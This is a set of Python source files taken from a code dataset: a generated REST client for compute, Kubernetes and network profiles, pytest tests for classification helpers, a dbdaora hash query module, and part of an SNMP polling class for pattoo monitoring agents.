(data) = self.delete_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def delete_compute_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""delete_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_compute_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_compute_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `delete_compute_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles/{profileName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_kubernetes_profile(self, name, **kwargs): # noqa: E501
"""delete_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_kubernetes_profile(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_kubernetes_profile_with_http_info(self, name, **kwargs): # noqa: E501
"""delete_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_kubernetes_profile_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_kubernetes_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_kubernetes_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_network_profile(self, profile_name, **kwargs): # noqa: E501
"""delete_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.delete_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def delete_network_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""delete_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_network_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `delete_network_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles/{profileName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_compute_profile(self, profile_name, **kwargs): # noqa: E501
"""get_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compute_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: ComputeProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.get_compute_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def get_compute_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""get_compute_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_compute_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The compute profile name (required)
:return: ComputeProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_compute_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `get_compute_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles/{profileName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComputeProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_kubernetes_profile(self, name, **kwargs): # noqa: E501
"""get_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kubernetes_profile(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: KubernetesProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_kubernetes_profile_with_http_info(name, **kwargs) # noqa: E501
return data
def get_kubernetes_profile_with_http_info(self, name, **kwargs): # noqa: E501
"""get_kubernetes_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_kubernetes_profile_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The kubernetes profile name (required)
:return: KubernetesProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_kubernetes_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_kubernetes_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='KubernetesProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_network_profile(self, profile_name, **kwargs): # noqa: E501
"""get_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_profile(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: NetworkProfile
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
else:
(data) = self.get_network_profile_with_http_info(profile_name, **kwargs) # noqa: E501
return data
def get_network_profile_with_http_info(self, profile_name, **kwargs): # noqa: E501
"""get_network_profile # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_network_profile_with_http_info(profile_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str profile_name: The network profile name (required)
:return: NetworkProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['profile_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_network_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'profile_name' is set
if ('profile_name' not in params or
params['profile_name'] is None):
raise ValueError("Missing the required parameter `profile_name` when calling `get_network_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'profile_name' in params:
path_params['profileName'] = params['profile_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles/{profileName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NetworkProfile', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_compute_profiles(self, **kwargs): # noqa: E501
"""List all compute profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_compute_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[ComputeProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_compute_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_compute_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_compute_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all compute profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_compute_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[ComputeProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_compute_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/compute-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ComputeProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_kubernetes_profiles(self, **kwargs): # noqa: E501
"""List all kubernetes profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_kubernetes_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[KubernetesProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_kubernetes_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_kubernetes_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_kubernetes_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all kubernetes profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_kubernetes_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[KubernetesProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_kubernetes_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/kubernetes-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[KubernetesProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_network_profiles(self, **kwargs): # noqa: E501
"""List all network profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_network_profiles(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[NetworkProfile]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_network_profiles_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_network_profiles_with_http_info(**kwargs) # noqa: E501
return data
def list_network_profiles_with_http_info(self, **kwargs): # noqa: E501
"""List all network profiles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_network_profiles_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[NetworkProfile]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_network_profiles" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth', 'uaa'] # noqa: E501
return self.api_client.call_api(
'/network-profiles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[NetworkProfile]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.744532 | 129 | 0.606138 | 42,797 | 0.992003 | 0 | 0 | 0 | 0 | 0 | 0 | 20,996 | 0.486672 |
0dcf49a2d7b38e623e09fc3e02b34c991f5df237 | 2,334 | py | Python | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | tests/test_utils.py | tesera/shclassify | 150a8ccfe0bd02a1510fa3bf9436b717ec427aff | [
"MIT"
] | null | null | null | import os
import pytest
import pandas as pd
import numpy as np
from shclassify.utils import (inverse_logit,
choose_from_multinomial_probs,
choose_from_binary_probs)
def test_inverse_logit():
assert inverse_logit(0) == 0.5
def test_choose_from_multinomial_probs():
n_obs = 3
classes = ['a', 'b', 'c']
df = pd.DataFrame(
np.random.uniform(size=(n_obs,len(classes))), columns=classes
)
classes = choose_from_multinomial_probs(df)
assert type(classes) is pd.DataFrame
assert classes.shape == (n_obs, 1)
assert classes.columns == ['class']
def in_classes(x, classes=classes):
x in classes
assert classes['class'].apply(in_classes).all()
def test_choose_from_multinomial_probs_with_bad_input():
n_obs = 3
classes = ['a']
df = pd.DataFrame(
np.random.uniform(size=(n_obs,len(classes))), columns=classes
)
with pytest.raises(ValueError) as e:
choose_from_multinomial_probs(df)
assert 'Data frame must have more than 1 column' in str(e.value)
def test_choose_from_binary_probs():
n_obs = 3
df = pd.DataFrame(
np.random.uniform(size=(n_obs,1))
)
classes = choose_from_binary_probs(df, 'true', 'false')
assert type(classes) is pd.DataFrame
assert classes.shape == (n_obs, 1)
assert classes.applymap(lambda x: x in ['true', 'false']).all()[0]
assert classes.columns == ['class']
def test_choose_from_binary_probs_with_bad_shape():
n_obs = 3
classes = ['a', 'b']
df = pd.DataFrame(
np.random.uniform(size=(n_obs,len(classes))), columns=classes
)
with pytest.raises(ValueError) as e:
choose_from_binary_probs(df, 'true', 'false')
assert 'Data frame must have 1 column' == str(e.value)
def test_choose_from_binary_probs_with_bad_args():
n_obs = 3
df = pd.DataFrame(
np.random.uniform(size=(n_obs,1))
)
with pytest.raises(ValueError) as e:
classes = choose_from_binary_probs(df, 'true', 'true')
assert 'Class names for true and false results must differ' == str(e.value)
with pytest.raises(ValueError) as e:
classes = choose_from_binary_probs(df, 'true', 'false', threshold=50)
assert 'Threshold must be between 0 and 1' == str(e.value)
| 28.120482 | 79 | 0.657241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 262 | 0.112254 |
0dd00d6b1371d82e5dba287fb1ab84b4b728cdc5 | 2,111 | py | Python | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | 21 | 2019-10-14T14:33:33.000Z | 2022-02-11T04:43:07.000Z | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | null | null | null | dbdaora/hash/query.py | dutradda/sqldataclass | 5c87a3818e9d736bbf5e1438edc5929a2f5acd3f | [
"MIT"
] | 1 | 2019-09-29T23:51:44.000Z | 2019-09-29T23:51:44.000Z | import dataclasses
from typing import Any, ClassVar, List, Optional, Sequence, Tuple, Type, Union
from dbdaora.keys import FallbackKey
from dbdaora.query import BaseQuery, Query, QueryMany
from .repositories import HashData, HashEntity, HashRepository
@dataclasses.dataclass(init=False)
class HashQuery(Query[HashEntity, HashData, FallbackKey]):
repository: HashRepository[HashEntity, FallbackKey]
fields: Optional[Sequence[str]] = None
def __init__(
self,
repository: HashRepository[HashEntity, FallbackKey],
*args: Any,
memory: bool = True,
key_parts: Optional[List[Any]] = None,
fields: Optional[Sequence[str]] = None,
**kwargs: Any,
):
super().__init__(
repository, memory=memory, key_parts=key_parts, *args, **kwargs,
)
self.fields = fields
@dataclasses.dataclass(init=False)
class HashQueryMany(QueryMany[HashEntity, HashData, FallbackKey]):
query_cls: ClassVar[Type[HashQuery[HashEntity, FallbackKey]]] = HashQuery[
HashEntity, FallbackKey
]
queries: Sequence[HashQuery[HashEntity, FallbackKey]] # type: ignore
repository: HashRepository[HashEntity, FallbackKey]
fields: Optional[Sequence[str]] = None
def __init__(
self,
repository: HashRepository[HashEntity, FallbackKey],
*args: Any,
many: List[Union[Any, Tuple[Any, ...]]],
memory: bool = True,
many_key_parts: Optional[List[List[Any]]] = None,
fields: Optional[Sequence[str]] = None,
**kwargs: Any,
):
super().__init__(
repository,
memory=memory,
many=many,
many_key_parts=many_key_parts,
*args,
**kwargs,
)
self.fields = fields
for query in self.queries:
query.fields = fields
def make(
*args: Any, **kwargs: Any
) -> BaseQuery[HashEntity, HashData, FallbackKey]:
if kwargs.get('many') or kwargs.get('many_key_parts'):
return HashQueryMany(*args, **kwargs)
return HashQuery(*args, **kwargs)
| 30.157143 | 78 | 0.639981 | 1,544 | 0.731407 | 0 | 0 | 1,614 | 0.764567 | 0 | 0 | 36 | 0.017054 |
0dd0d2e19f18724ff736d3e77f451b5b939ad9d4 | 20,104 | py | Python | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | pattoo_agents/snmp/snmp.py | palisadoes/pattoo-agents | d73453ceac1747573dfbcad4da724325e86b208d | [
"Apache-2.0"
] | null | null | null | """Module used polling SNMP enabled targets."""
import sys
# PIP3 imports
import easysnmp
from easysnmp import exceptions
# Import Pattoo libraries
from pattoo_shared import log
from pattoo_shared.variables import DataPoint
from pattoo_shared.constants import (
DATA_INT, DATA_COUNT64, DATA_COUNT, DATA_STRING, DATA_NONE)
from pattoo_agents.snmp import oid as class_oid
from pattoo_agents.snmp.variables import SNMPVariable
class SNMP():
"""Class to interact with targets using SNMP."""
def __init__(self, snmpvariable):
"""Initialize the class.
Args:
snmpvariable: SNMPVariable object
Returns:
None
"""
# Initialize key variables
self._snmp_ip_target = snmpvariable.ip_target
self._snmp_version = snmpvariable.snmpauth.version
self._snmpvariable = snmpvariable
def contactable(self):
"""Check if target is contactable.
Args:
target_id: Target ID
Returns:
_contactable: True if a contactable
"""
# Define key variables
_contactable = False
result = None
# Get target data
target_name = self._snmp_ip_target
# Try to reach target
try:
# If we can poll the SNMP sysObjectID,
# then the target is contactable
result = self.sysobjectid(check_reachability=True)
if bool(result) is True:
_contactable = True
except Exception as exception_error:
# Not contactable
_contactable = False
# Log a message
log_message = ('''\
Unable to access target {} via SNMP. Make sure target is contactable and \
that the database\'s SNMP parameters for the target are correct. Fix, repeat \
your command AND make sure you set --.valid=True. Error: {}\
'''.format(target_name, exception_error))
log.log2see(51035, log_message)
except:
# Not contactable
_contactable = False
# Log a message
log_message = (
'Unexpected SNMP error for target {}'
''.format(target_name))
log.log2see(51036, log_message)
# Return
return _contactable
def sysobjectid(self, check_reachability=False):
"""Get the sysObjectID of the target.
Args:
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
Returns:
object_id: sysObjectID value
"""
# Initialize key variables
oid = '.1.3.6.1.2.1.1.2.0'
object_id = None
# Get sysObjectID
results = self.get(oid, check_reachability=check_reachability)
if bool(results) is True:
object_id = results
# Return
return object_id
def oid_exists(self, oid_to_get, context_name=''):
"""Determine existence of OID on target.
Args:
oid_to_get: OID to get
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
validity: True if exists
"""
# Initialize key variables
validity = False
# Process
(_, validity, result) = self.query(
oid_to_get,
get=True,
check_reachability=True, context_name=context_name,
check_existence=True)
# If we get no result, then override validity
if bool(result) is False:
validity = False
else:
validity = True
# Return
return validity
def branch_exists(self, oid_to_get, context_name=''):
"""Determine existence of OID on target.
Args:
oid_to_get: OID to get
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
validity: True if exists
"""
# Initialize key variables
validity = False
# Process
(_, validity, results) = self.query(
oid_to_get, get=False,
check_reachability=True,
context_name=context_name,
check_existence=True)
# If we get no result, then override validity
if bool(results) is False:
validity = False
else:
validity = True
# Return
return validity
def walk(
self, oid_to_get, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMPwalk.
Args:
oid_to_get: OID to walk
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
result: Dictionary of tuples (OID, value)
"""
(_, _, result) = self.query(
oid_to_get, get=False,
check_reachability=check_reachability,
check_existence=check_existence,
context_name=context_name)
return result
def get(
self, oid_to_get, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMPget.
Args:
oid_to_get: OID to get
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
Dictionary of tuples (OID, value)
"""
(_, _, _result) = self.query(
oid_to_get, get=True,
check_reachability=check_reachability,
check_existence=check_existence,
context_name=context_name)
if bool(_result) is True:
result = _result
else:
result = None
return result
def query(
self, oid_to_get, get=False, check_reachability=True,
check_existence=False, context_name=''):
"""Do an SNMP query.
Args:
oid_to_get: OID to walk
get: Flag determining whether to do a GET or WALK
check_reachability:
Set if testing for connectivity. Some session
errors are ignored so that a null result is returned
check_existence:
Set if checking for the existence of the OID
context_name: Set the contextName used for SNMPv3 messages.
The default contextName is the empty string "". Overrides the
defContext token in the snmp.conf file.
Returns:
Dictionary of tuples (OID, value)
"""
# Initialize variables
_contactable = True
exists = True
results = []
# Create OID string object
oid_string = class_oid.OIDstring(oid_to_get)
# Check if OID is valid
valid_format = oid_string.valid_format()
if valid_format is False:
log_message = ('OID {} has an invalid format'.format(oid_to_get))
log.log2die(51449, log_message)
# Create SNMP session
session = _Session(
self._snmpvariable, context_name=context_name).session
# Create failure log message
try_log_message = (
'Error occurred during SNMPget {}, SNMPwalk {} query against '
'target {} OID {} for context "{}"'
''.format(
get, not get, self._snmp_ip_target,
oid_to_get, context_name))
# Fill the results object by getting OID data
try:
# Get the data
if get is True:
results = [session.get(oid_to_get)]
else:
if self._snmp_version != 1:
# Bulkwalk for SNMPv2 and SNMPv3
results = session.bulkwalk(
oid_to_get, non_repeaters=0, max_repetitions=25)
else:
# Bulkwalk not supported in SNMPv1
results = session.walk(oid_to_get)
# Crash on error, return blank results if doing certain types of
# connectivity checks
except (
exceptions.EasySNMPConnectionError,
exceptions.EasySNMPTimeoutError,
exceptions.EasySNMPUnknownObjectIDError,
exceptions.EasySNMPNoSuchNameError,
exceptions.EasySNMPNoSuchObjectError,
exceptions.EasySNMPNoSuchInstanceError,
exceptions.EasySNMPUndeterminedTypeError) as exception_error:
# Update the error message
try_log_message = ("""\
{}: [{}, {}, {}]""".format(try_log_message, sys.exc_info()[0],
sys.exc_info()[1], sys.exc_info()[2]))
# Process easysnmp errors
(_contactable, exists) = _process_error(
try_log_message, exception_error,
check_reachability, check_existence)
